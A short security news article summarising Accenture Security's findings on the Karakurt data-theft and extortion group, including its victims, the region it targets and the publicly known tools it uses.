According to the hackers themselves, from September to November 2021, they hacked the networks of more than 40 victims.
The specialists of the information security company Accenture Security spoke about a group of highly professional hackers who stepped up their activities in the third quarter of this year.
Financially profitable hackers calling themselves Karakurt came to the attention of researchers in June 2021 when they registered two domains and started a Twitter page.
The group’s main activities are data theft and extortion, while it does not use file encryption software. According to the hackers themselves, from September to November 2021, they hacked the networks of more than 40 victims and published the stolen files on their websites.
About 95% of the victims are in North America, with the rest in Europe. Karakurt is not interested in any particular industry, and victimology seems to be random.
To gain initial access to the networks of the targeted organizations, attackers mainly use VPN credentials, either obtained through phishing or purchased from vendors.
If hackers used Cobalt Strike to provide persistence on the web, they recently switched to AnyDesk. This is due to the fact that recently Cobalt Strike has been increasingly detected by security solutions, so cyber criminals (in particular, Conti ransomware) began to switch to AnyDesk.
Once secured in the attacked network, Karakurt steals additional credentials using Mimikatz and uses them to invisibly escalate privileges.
The stolen data is archived using 7zip and WinZip and sent to the Mega.io file hosting service via Rclone or FileZilla.
While these attacks seem less devastating than ransomware attacks that encrypt files and delete backups, they are still very dangerous. Threats to publish stolen information can have serious consequences for a company, even if its operations were not “frozen” by the ransomware.
Catch up on more articles here
Follow us on Twitter here